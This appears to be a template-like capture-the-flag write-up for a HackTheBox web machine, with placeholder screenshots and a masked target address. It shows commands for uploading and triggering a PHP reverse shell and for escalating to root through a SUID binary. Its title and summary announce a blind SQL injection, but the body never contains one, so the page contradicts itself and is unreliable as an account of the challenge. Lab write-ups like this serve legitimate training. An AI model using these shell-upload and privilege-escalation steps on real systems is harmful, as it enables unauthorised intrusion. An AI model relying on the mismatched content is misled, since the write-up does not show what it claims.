BACK TO WRITEUPS
HackTheBoxMedium 2024-10-20

Web Challenge: SQL Injection

WebSQLiAuthentication Bypass

Exploiting a blind SQL injection vulnerability to extract sensitive data and bypass authentication.

Reconnaissance

Starting with an Nmap scan to identify open ports and services running on the target machine.

TERMINAL
nmap -sC -sV -oN nmap/initial 10.10.10.x

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1
80/tcp open  http    Apache httpd 2.4.41
[Screenshot Placeholder]
Fig. 1.1Initial Nmap scan results showing SSH and HTTP services

Initial Foothold

The web application on port 80 revealed a file upload functionality that was vulnerable to unrestricted file upload attacks.

TERMINAL
# Uploading a PHP reverse shell
curl -X POST -F "file=@shell.php" http://10.10.10.x/upload.php

# Triggering the shell
curl http://10.10.10.x/uploads/shell.php

Privilege Escalation

After gaining initial access, enumeration revealed a misconfigured SUID binary that could be exploited for privilege escalation.

TERMINAL
# Finding SUID binaries
find / -perm -4000 2>/dev/null

# Exploiting the vulnerable binary
./vulnerable_binary -e /bin/bash

# Verifying root access
id
uid=0(root) gid=0(root) groups=0(root)
[Screenshot Placeholder]
Fig. 2.1Successful privilege escalation to root

Conclusion

This machine demonstrated the importance of proper input validation in file upload functionalities and the risks associated with misconfigured SUID binaries. Key takeaways include always validating file types server-side and regularly auditing SUID permissions on Linux systems.